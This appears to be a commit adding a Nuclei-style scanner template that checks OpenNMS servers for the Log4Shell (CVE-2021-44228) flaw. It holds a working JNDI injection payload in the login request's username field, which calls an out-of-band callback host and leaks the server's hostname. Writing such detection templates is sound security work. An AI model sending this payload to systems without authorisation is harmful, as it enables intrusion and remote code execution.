Create opennms-log4j-jndi-rce.yaml

vulnerabilities/other/opennms-log4j-jndi-rce.yaml

@@ -0,0 +1,42 @@
+id: opennms-log4j-jndi-rce
+
+info:
+  name: OpenNMS Log4J JNDI RCE
+  author: johnk3r
+  severity: high
+  description: OpenNMS Apache Log4j2 <=2.14.1 JNDI in features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker
+    who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
+  reference:
+    - https://www.horizon3.ai/the-long-tail-of-log4shell-exploitation/
+    - https://www.opennms.com/en/blog/2021-12-10-opennms-products-affected-by-apache-log4j-vulnerability-cve-2021-44228/
+  classification:
+    cve-id: CVE-2021-44228
+  tags: jndi,log4j,rce,cve,cve2021,opennms
+
+requests:
+  - raw:
+      - |
+        POST /opennms/j_spring_security_check HTTP/1.1
+        Referer: {{RootURL}}/opennms/login.jsp
+        Content-Type: application/x-www-form-urlencoded
+
+        j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&Login=&j_usergroups=
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the DNS Interaction
+        words:
+          - "dns"
+
+      - type: regex
+        part: interactsh_request
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Match for extracted ${hostName} variable
+
+    extractors:
+      - type: regex
+        part: interactsh_request
+        group: 1
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${hostName} in output